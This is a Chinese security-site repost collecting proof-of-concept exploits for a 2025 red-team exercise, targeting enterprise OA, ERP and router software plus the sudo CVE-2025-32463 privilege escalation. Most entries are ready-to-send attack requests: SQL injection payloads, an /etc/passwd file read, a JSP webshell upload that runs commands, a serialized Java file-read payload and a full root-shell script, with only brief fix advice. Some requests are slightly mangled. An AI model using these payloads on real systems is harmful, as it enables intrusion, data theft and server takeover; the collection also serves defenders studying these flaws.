【2025护网漏洞POC速存】吃苕皮喝挪瓦,HW轻松拿捏

admin 2025年7月5日13:50:24评论24 views字数 8526阅读28分25秒阅读模式

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

【2025护网漏洞POC速存】吃苕皮喝挪瓦,HW轻松拿捏

漏洞名称:泛微 OA 前台登录绕过+后台 RCE

漏洞描述:

/dwr/call 接口密钥泄露:攻击者通过调用接口/dwr/call/plaincall/,

指定 WorkflowSubwfSetUtil.LoadTemplateProp 方法,可读取系统硬编码的 AES密钥

修复建议

升级至安全版本,官方修复版本:≥ v10.57.2

漏洞名称:IBM WebSphere Application Server 远程代码执行漏洞

漏洞描述:

IBM WebSphere Application Server 对反序列化操作的安全控制机制存在严重缺陷。当系统处理远程客户端传入的序列化数据时,未能实施有效的对象类型校验和来源认证,使得攻击者能够构造包含恶意调用链的特制序列化对象。这些对象在反序列化过程中会触发 Java 反射机制,通过精心设计的对象链最终执行 Runtime.exec()等敏感系统调用,导致攻击者能够以 WebSphere服务账户权限在目标服务器上执行任意命令。

修复建议

尽快安装补丁进行防护。

下载链接:https://www.ibm.com/support/pages/node/7237824

漏洞名称:用友 畅捷通T+ 信息泄露

漏洞描述:

getdecallusers 存在信息泄露漏洞,可获取系统用户个人信息。

修复建议:

请及时联系官方售后或客服升级至最新版本,官网地址:https://www.chanjet.com/

漏洞名称:RuoYi 任意文件读取漏洞

漏洞描述:

/demo/mail/sendMessageWithAttachment和 /sendMessageWithAttachments 接口未进行身份验证,攻击者可指定任意文件路径作为附件发送邮件,导致服务器敏感信息泄露。

GET /demo/mail/sendMessageWithAttachment?to=test111@163.com&subject=Test-Mail&text=This%20is%20a%20test%20message&filePath=/etc/passwd HTTP/1.1HostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/123.0

修复建议:

限制访问 /demo/mail/sendMessageWithAttachment和 /demo/mail/sendMessageWithAttachments 接口  或 升级至 RuoYi-Vue-Plus ≥ 5.4.1 版本

漏洞名称:用友NC changeEvent SQL注入漏洞

漏洞描述:

changeEvent接口存在SQL注入漏洞,未授权攻击者可获取数据库权限并导致服务器失陷。

修复建议:

限制访问/weaver/weaver.email.FileDownloadLocation/login/LoginSSOxjsp/x.FileDownloadLocation路径

漏洞名称:汉王e脸通综合管理平台SQL注入漏洞

漏洞描述:

queryManyPeopleGroupList.do接口存在SQL注入漏洞,攻击者可获取数据库敏感信息。

修复建议:

限制访问/manage/authMultiplePeople/queryManyPeopleGroupList.do

漏洞名称:明源地产ERP身份认证绕过漏洞

漏洞描述:

明源地产ERP存在未公开身份认证绕过漏洞,攻击者可绕过验证直接访问管理后台窃取企业信息。检

修复建议:

监测/PubPlatform/nav/login/sso/login.aspx及user_info的请求

漏洞名称:NiBox路由器SQL注入漏洞

漏洞描述:

authentication/update_byod.php接口存在SQL注入漏洞

POST /authentication/update_byod.php HTTP/1.1HostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Accept-Encoding: gzip, deflateConnection: closeupdate=1&macAddress=1' AND (SELECT 2222 FROM (SELECT(SLEEP(5)))ogZo) AND 'NXsn'='NXsn&oldMacAddress=

漏洞名称:深信服运维安全管理系统全版本命令执行漏洞

漏洞描述;

攻击者可利用未公开漏洞绕过认证,通过特定接口实现远程命令执行,获取服务器控制权限

修复建议:

1.立即联系厂商获取安全补丁;2.限制管理端口访问权限;

漏洞名称:泛微OA全版本目录信息泄露

漏洞描述:

jqueryFileTree.jsp目录信息泄露漏洞,攻击者通过dir参数遍历服务器目录导致敏感信息泄露

修复建议:

删除或重命名jqueryFileTree.jsp

漏洞名称:安科瑞智能环保云平台

漏洞描述:

/getmonitorrealdata接口存在SQL注入漏洞,可获取数据库权限

修复建议:

部署SQL注入防护产品

漏洞名称:金和OA全版本SQL注入漏洞

漏洞描述:

/C6/JHSoft.Web.DailyTaskManage/TaskTreeJsoN.aspx存在SQL注入漏洞

修复建议:

部署SQL注入防护产品

漏洞名称:用友NC listUserSharingEvents 存在SQL注入

漏洞描述:

GET /portal/pt/oacoSchedulerEvents/listUserSharingEvents?agent=1')+AND+1=dbms_pipe.receive_message('RDS',5)--&pageId=login&sch_ed=2&sch_sd=1 HTTP/1.1HostAccept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

漏洞描述:用友NC changeEvent 存在SQL注入

漏洞描述:

POST /portal/pt/oacoSchedulerEvents/changeEvent?pageId=login HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedevent_id=1' AND 1=dbms_pipe.receive_message('RDS',5)--+#&startDate=2025-07-01 00:00:00&startDate_old=2025-07-01 24:00:00

漏洞名称:用友NC-Cloud IBapIOService存在SQL注入

漏洞描述:

POST /uapws/service/nc.itf.bap.service.IBapIOService HTTP/1.1HostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: text/xml<?xml version="1.0" encoding="UTF-8" standalone="no"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gs="http://service.bap.itf.nc/IBapIOService">    <soapenv:Header/>    <soapenv:Body>        <gs:getBapTableDatas>            <gs:stringarrayItem>                DWQueue@MessageQueue' AND 1=UTL_INADDR.GET_HOST_ADDRESS('~'||(user)||'~')-- abc            </gs:stringarrayItem>        </gs:getBapTableDatas>    </soapenv:Body></soapenv:Envelope>

漏洞名称:用友NC qrySubPurchaseOrgByParentPk 存在SQL注入

漏洞描述:

POST /ebvp/register/qrySubPurchaseOrgByParentPk HTTP/1.1HostContent-Type: application/x-www-form-urlencodedpk_group=1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('RDS',5) --

漏洞名称:用友FE协同平台存在文件上传

漏洞描述:

POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=123.jpg&title1=%C9%CF%B4%AB%CE%C4%BC%FE&title2=%D1%A1%D4%F1%CE%C4%BC%FE&allowsize=null&extName=.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.1018.84 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123456789------WebKitFormBoundary123456789Content-Disposition: form-data; name="accessory"; filename="123.jsp"Content-Type: application/octet-stream<% out.println("e165421110ba03099a1c0393373c5b43");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------WebKitFormBoundary123456789--

访问上传后的文件(GET)

GET /images/upload/123.jsp HTTP/1.1HostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.2331.38 Safari/537.36

漏洞利用请求(上传 WebShell + 执行命令)

POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=123.jpg&title1=%C9%CF%B4%AB%CE%C4%BC%FE&title2=%D1%A1%D4%F1%CE%C4%BC%FE&allowsize=null&extName=.jsp HTTP/1.1Hosttarget.comUser-AgentMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.1018.84 Safari/537.36Content-Typemultipart/form-data; boundary=----WebKitFormBoundary123456789------WebKitFormBoundary123456789Content-Disposition: form-data; name="accessory"; filename="123.jsp"Content-Type: application/octet-stream<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));}new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------WebKitFormBoundary123456789--

访问 WebShell 执行命令

GET /images/upload/123.jsp?cmd=whoami HTTP/1.1HostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.2331.38 Safari/537.36

漏洞描述:用友U8 Cloud FileManageServlet存在任意文件读取

漏洞描述:

POST /service/FileManageServlet HTTP/1.1Host:User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/octet-stream{{unquote("xacxedx00x05srx00x11java.util.HashMapx05x07xdaxc1xc3x16`xd1x03x00x02Fx00x0aloadFactorIx00x09thresholdxp?@x00x00x00x00x00x0cwx08x00x00x00x10x00x00x00x03tx00x04pathtx00x12C:\Windows\win.initx00x06dsNametx00x03plmtx00x08operTypetx00x0ddownloadlocalx")}}

漏洞名称:用友BIP数据应用服务存在未授权访问

漏洞描述:

GET /bi/api/SemanticModel/GetOlapConnectionList/?token=e30fe47a-f33e-463e-bc4a-843957ca88dd_263720ea7e397482da220115cae828_1214162142339 HTTP/1.1Host: target.comAccept: application/jsonConnection: close

漏洞名称: CVE-2025-32463   sudo提权

漏洞描述:

#!/bin/bash# sudo-chwoot.sh# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch#                  @ Stratascale Cyber Research Unit (CRU)STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)cd ${STAGE?} || exit 1cat > woot1337.c<<EOF#include <stdlib.h>#include <unistd.h>__attribute__((constructor)) void woot(void) {  setreuid(0,0);  setregid(0,0);  chdir("/");  execl("/bin/bash", "/bin/bash", NULL);}EOFmkdir -p woot/etc libnss_echo "passwd: /woot1337" > woot/etc/nsswitch.confcp /etc/group woot/etcgcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.cecho "woot!"sudo -R woot wootrm -rf ${STAGE?}

漏洞名称:畅捷通T+ GLSyncService.asmx SQL注入漏洞

漏洞描述:

/tplus/GLSyncService.asmx接口存在SOAP注入漏洞

POST /tplus/GLSyncService.asmx HTTP/1.1Host: {{Hostname}}SOAPAction: "http://www.chanjet.com/GetSourceAccountDataTable"Content-Type: text/xml; charset=utf-8<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <GetSourceAccountDataTablexmlns="http://www.chanjet.com/">      <versionType>' UNION ALL SELECT NULL,@@VERSION,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VsIH</versionType>    </GetSourceAccountDataTable>  </soap:Body></soap:Envelope>

其他

帆软报表fr_remote_design 接口存在未授权文件上传漏洞

美特 CRMsendsms.jsp 存在任意文件上传漏洞

畅捷通T+ keyEdit.aspx SQL注入

浪擎DAYS灾备任意文件上传

圣博润堡垒机远程代码执行

浪潮GS任意文件读取

唯德知识产权管理系统 WSDownloadPDF存在任意文件读取漏洞

华天软件Inforcenter PLM 存在任意文件读取漏洞

昂捷CRM UploadFile 存在文件上传致RCE漏洞

泛微OA E-cology plugin.xml存在未授权访句

汉王e脸通综合管理平台

queryMeetingFile.do 存在SOL注入漏洞美特CRM sendsms.jsp 文件上传致RCE漏洞泛微OA前台登录绕过+后台组合拳RCE

汉王e脸通综合管理平台

queryMeetingFile.do SOL注入漏洞

Brother打印机mnt info.csv默认管理员密码

【2025护网漏洞POC速存】吃苕皮喝挪瓦,HW轻松拿捏

原文始发于微信公众号(网络安全透视镜):【2025护网漏洞POC速存】吃苕皮喝挪瓦,HW轻松拿捏

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月5日13:50:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【2025护网漏洞POC速存】吃苕皮喝挪瓦,HW轻松拿捏http://cn-sec.com/archives/4221978.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息